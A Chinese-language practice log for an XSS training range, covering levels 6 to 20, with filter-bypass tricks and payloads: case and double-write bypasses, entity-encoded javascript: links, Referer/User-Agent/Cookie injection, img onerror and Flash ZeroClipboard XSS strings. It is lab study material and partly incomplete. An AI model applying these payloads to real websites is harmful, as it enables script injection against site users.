XSS靶场练习题
level6
http://test.ctf8.com/level6.php?keyword=break%20itout!
script、href、onfocus都被过滤了
大写可以绕过
level7
http://test.ctf8.com/level7.php?keyword=move%20up!
直接把script删了
双写
level8
http://test.ctf8.com/level8.php?keyword=nice%20try!
上面输入的"<>被替换成ASCII(好像没什么影响),添加链接的script被过滤了,不能大小写绕过
(输入的就是底下添加的友情链接,那javascript:alert(‘ok’)也用ASCII替换一个
添加以后要点友情链接!
level9
http://test.ctf8.com/level9.php?keyword=not%20bad!
依旧有友情链接
可能是过滤了非链接类的(比如http开头?
过滤了script
用ascii替换,把网址注释了就行
level10
http://test.ctf8.com/level10.php?keyword=well%20done!
页面没有输入框,改成get输入了
源码有个输入表单,三个值
不知道为什么只有第三个可以输入
level11
http://test.ctf8.com/level11.php?keyword=good%20job!
ref值大概是来源
用上一关的方法不行
抓包把refer改了
复制可以打开返回页面
level12
http://test.ctf8.com/level12.php?keyword=good%20job!
这次是抓包改User-Agent
level13
http://test.ctf8.com/level13.php?keyword=good%20job!
改cookie:user=1" type=“text” οnclick=“alert(1)”
level14
http://test.ctf8.com/level14.php
好像出了什么问题。。。不知道是什么意思
level15
http://test.ctf8.com/xsschallenge/level15.php?src=1.gif
还是不知道发生了什么
level16
猜了个网址
http://test.ctf8.com/level16.php?keyword=1
keyword在center标签内,会直接出现在页面
script、/、空格被屏蔽,%0a:回车
<img src=1 onerror=alert(1)>
找不到图片1时弹出1
level17
http://test.ctf8.com/level17.php?arg01=a&arg02=b
level18
http://test.ctf8.com/level18.php?arg01=a&arg02=b
跟上题一样的做法。。没发现有什么不同
level19
http://test.ctf8.com/level19.php?arg01=a&arg02=b
搜了以后说是xss flash
http://test.ctf8.com/level19.php?arg01=version&arg02=%3Ca%20href=%22javascript:alert(1)%22%3Etext%3C/a%3E
version=<a href="javascript:alert(1)">text</a>
点击text时运行alert(1)
level20
http://test.ctf8.com/level21.php?arg01=a&arg02=b
还是xss flash
http://test.ctf8.com/level20.php?arg01=id&arg02=\"))}catch(e){(alert)(1);}//%26width%26height
中的zeroclipboard.swf
ZeroClipboard.swf?id=\%22))}catch(e){(alert)(/XSS/.source);}//&width=500&height=500
&被过滤